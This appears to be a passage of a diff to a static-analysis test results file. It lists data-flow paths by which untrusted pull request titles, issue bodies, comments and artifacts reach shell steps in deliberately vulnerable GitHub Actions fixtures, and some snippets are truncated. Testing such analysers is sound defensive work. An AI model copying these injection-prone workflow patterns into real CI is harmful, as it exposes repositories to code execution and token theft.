.github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | provenance | | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | provenance | | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | provenance | | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | provenance | | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | provenance | | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | provenance | | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | provenance | | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | provenance | | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | 
.github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | provenance | | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | provenance | | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | provenance | | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | provenance | | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | provenance | | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | provenance | | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | provenance | | +| 
.github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | provenance | | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | provenance | | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | provenance | | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | provenance | | +| .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | provenance | | +| .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/reusable-workflow-2.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-2.yml:66:34:66:52 | env.prev_log | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | 
+| .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | +| .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | +| .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | provenance | | +| .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | provenance | | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | provenance | | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | provenance | | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | provenance | | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | provenance | | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | provenance | | +| .github/workflows/slash_command2.yml:11:9:20:6 | Uses Step: command | 
.github/workflows/slash_command2.yml:20:21:20:66 | steps.command.outputs.command-arguments | provenance | | +| .github/workflows/test1.yml:15:5:27:39 | Job: updateJira [ISSUE_KEY] | .github/workflows/test1.yml:27:20:27:39 | env.ISSUE_KEY | provenance | | +| .github/workflows/test1.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test1.yml:15:5:27:39 | Job: updateJira [ISSUE_KEY] | provenance | | +| .github/workflows/test2.yml:17:9:25:6 | Uses Step: changed | .github/workflows/test2.yml:27:26:27:66 | steps.changed.outputs.locale_files | provenance | | +| .github/workflows/test2.yml:29:9:37:6 | Uses Step: changed2 | .github/workflows/test2.yml:39:25:39:66 | steps.changed2.outputs.locale_files | provenance | | +| .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | .github/workflows/test3.yml:60:27:60:66 | needs.parse-issue.outputs.payload | provenance | | +| .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test3.yml:11:7:12:4 | Job outputs node [payload] | provenance | | +| .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | +| .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | 
.github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | .github/workflows/test11.yml:54:20:54:60 | needs.get-artifacts.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | .github/workflows/test11.yml:19:7:21:4 | Job outputs node [pr_num] | provenance | | +| .github/workflows/test11.yml:22:9:30:6 | Uses Step | .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | .github/workflows/test11.yml:19:16:19:50 | steps.set-ref.outputs.pr_num | provenance | | +| .github/workflows/test11.yml:32:14:44:44 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" 
] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_OUTPUT\necho "ref=$ref" >> $GITHUB_OUTPUT\n | .github/workflows/test11.yml:30:9:46:2 | Run Step: set-ref [pr_num] | provenance | | +| .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | .github/workflows/test14.yml:16:21:16:60 | steps.changed-files.outputs.files | provenance | | +| .github/workflows/test14.yml:14:14:15:117 | echo "files=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:13:9:16:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | .github/workflows/test14.yml:27:21:27:60 | steps.changed-files.outputs.files | provenance | | +| .github/workflows/test14.yml:24:14:26:52 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "files=${FILES}" >> "$GITHUB_OUTPUT"\n | .github/workflows/test14.yml:23:9:27:6 | Run Step: changed-files [files] | provenance | | +| .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | .github/workflows/test14.yml:37:21:37:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:35:14:36:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:29:5:38:2 | Job: test3 [CHANGED-FILES] | provenance | | +| .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | .github/workflows/test14.yml:48:21:48:44 | env.CHANGED-FILES | provenance | | +| .github/workflows/test14.yml:45:14:47:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:39:5:48:45 | Job: test4 [CHANGED-FILES] | provenance | | +| .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | 
.github/workflows/test15.yml:13:21:13:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:11:14:12:103 | echo "title=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:10:9:13:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | .github/workflows/test15.yml:21:21:21:52 | steps.title.outputs.title | provenance | | +| .github/workflows/test15.yml:18:14:20:53 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "title=$PR_TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test15.yml:17:9:21:6 | Run Step: title [title] | provenance | | +| .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | .github/workflows/test15.yml:28:21:28:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:26:14:27:100 | echo "TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:23:5:29:2 | Job: test3 [TITLE] | provenance | | +| .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | .github/workflows/test15.yml:36:21:36:36 | env.TITLE | provenance | | +| .github/workflows/test15.yml:33:14:35:50 | PR_TITLE=$(jq --raw-output .pull_request.title ${GITHUB_EVENT_PATH})\necho "TITLE=$PR_TITLE" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:30:5:36:37 | Job: test4 [TITLE] | provenance | | +| .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | provenance | | +| .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | .github/workflows/test16.yml:20:13:24:8 | Job outputs node [ref] | provenance | | +| .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:38:15:45:12 | Uses Step | 
.github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | provenance | Config | +| .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | .github/workflows/test16.yml:21:19:21:48 | steps.ref.outputs.value | provenance | | +| .github/workflows/test16.yml:47:20:47:64 | echo "value=$(> $GITHUB_OUTPUT | .github/workflows/test16.yml:45:15:50:12 | Run Step: ref [value] | provenance | | +| .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | provenance | | +| .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | .github/workflows/test16.yml:99:13:102:8 | Job outputs node [commit-message] | provenance | | +| .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | .github/workflows/test16.yml:100:30:100:70 | steps.commit-message.outputs.value | provenance | | +| .github/workflows/test16.yml:125:20:125:75 | echo "value=$(git log -1 --pretty=%s)" >> $GITHUB_OUTPUT | .github/workflows/test16.yml:123:15:128:12 | Run Step: commit-message [value] | provenance | | +| .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | provenance | | +| .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | provenance | | +| .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | +| .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | +| .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | +| 
.github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json 
files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | .github/workflows/test19.yml:62:21:62:57 | 
steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | provenance | | +| 
.github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | provenance | | +| .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | provenance | | +| 
.github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | provenance | | +| .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:17:9:22:6 | Run Step: read_issue_body [body] | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | provenance | | +| .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | provenance | | +| .github/workflows/test26.yml:26:18:26:58 | steps.read_issue_body.outputs.body | .github/workflows/test26.yml:22:9:28:6 | Uses Step: parse [data] | provenance | | +| .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | provenance | | +| .github/workflows/test27.yml:20:23:20:68 | steps.get-version.outputs.chart_version | .github/workflows/test27.yml:19:7:21:4 | Job outputs node [chart-version] | provenance | | +| .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:43:14:44:66 | echo "chart_version=$(> $GITHUB_OUTPUT\n | semmle.label | unzip input.zip\necho current directory contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | semmle.label | steps.prepare.outputs.pr | +| .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning4.yml:17:9:21:6 | Run Step: artifact 
[id] | semmle.label | Run Step: artifact [id] | +| .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | semmle.label | set -x\n# Set initial placeholder name/mail and read it from the patch later\ngit config --global user.email 'foo@bar'\ngit config --global user.name 'Foo Bar'\n\ngit am version_increments.patch\n\n# Read the author's name+mail from the just applied patch and recommit it with both set as committer\nbotMail=$(git log -1 --pretty=format:'%ae')\nbotName=$(git log -1 --pretty=format:'%an')\ngit config --global user.email "${botMail}"\ngit config --global user.name "${botName}"\ngit commit --amend --no-edit\n\nfileList=$(git diff-tree --no-commit-id --name-only HEAD -r)\necho "file-list<> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:84:28:84:71 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:94:30:94:70 | steps.git-commit.outputs.file-list | semmle.label | steps.git-commit.outputs.file-list | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | semmle.label | input taint | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | +| 
